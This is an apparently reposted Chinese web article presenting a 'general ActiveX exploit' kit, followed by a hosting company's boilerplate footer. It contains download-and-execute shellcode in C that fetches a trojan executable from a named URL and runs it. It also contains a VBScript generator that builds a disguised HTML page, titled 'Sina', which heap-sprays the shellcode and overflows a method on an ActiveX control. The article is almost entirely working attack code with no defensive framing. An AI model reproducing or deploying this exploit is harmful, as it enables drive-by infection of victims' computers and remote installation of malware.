ActiveX漏洞通用Exploit vbs修正版
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
C++代码 复制代码 代码如下: #include<stdio.h> #include<string.h> unsignedcharshellcode[]= "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF" "http://fenggou.net/muma.exe"; intmain() { void(*code)();//把ShellCode转换成一个参数为空,返回为空的函数指针,并调用 *(int*)&code=shellcode; code(); } vbs代码 复制代码 代码如下: exeurl=InputBox("Pleaseinputyouwantdown&execurl:","输入","http://jb51.net/muma.exe") ifexeurl<>""then code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"&Unicode(exeurl&Chr(00)&Chr(00)) FunctionUnicode(str1) Dimstr,temp str="" Fori=1tolen(str1) temp=Hex(AscW(Mid(str1,i,1))) Iflen(temp)<5Thentemp=right("0000"&temp,2) str=str&"\x"&temp Next Unicode=str EndFunction functionreplaceregex(str) setregex=newregExp regex.pattern="\\x(..)\\x(..)" regex.IgnoreCase=true regex.global=true matches=regex.replace(str,"%u$2$1") replaceregex=matches endFunction setfso=createObject("scripting.filesystemobject") iffso.FileExists("jb51.htm")then fso.deleteFile"jb51.htm",True endIf setfileS=fso.opentextfile("jb51.htm",8,true) fileS.writeline"<html>" fileS.writeline"<title>Sina</title>" fileS.writeline"<objectclassid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D""id=''target''></object>" fileS.writeline"<body>" fileS.writeline"<SCRIPTlanguage=""JavaScript"">" fileS.writeline"varshellcode=unescape("""&replaceregex(code)&""");" fileS.writeline"varbigblock=unescape(""%u9090%u9090"");" fileS.writeline"varheadersize=20;" fileS.writeline"varslackspace=headersize+shellcode.length;" fileS.writeline"while(bigblock.length<slackspace)bigblock+=bigblock;" fileS.writeline"fillblock=bigblock.substring(0,slackspace);" fileS.writeline"block=bigblock.substring(0,bigblock.length-slackspace);" fileS.writeline"while(block.length+slackspace<0x40000)block=block+block+fillblock;" fileS.writeline"memory=newArray();" fileS.writeline"for(x=0;x<300;x++)memory[x]=block+shellcode;" fileS.writeline"varbuffer='''';" fileS.writeline"while(buffer.length<218)buffer+=''\x0a\x0a\x0a\x0a'';" fileS.writeline"target.Method1(buffer);" fileS.writeline"</script>" fileS.writeline"</body>" fileS.writeline"</html>" files.Close Setfso=nothing endif |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: vbs更改3389远程桌面端口的脚本下一篇: 批量文件查找替换功能的vbs脚本
关于ActiveX漏洞通用Exploit vbs修正版的所有评论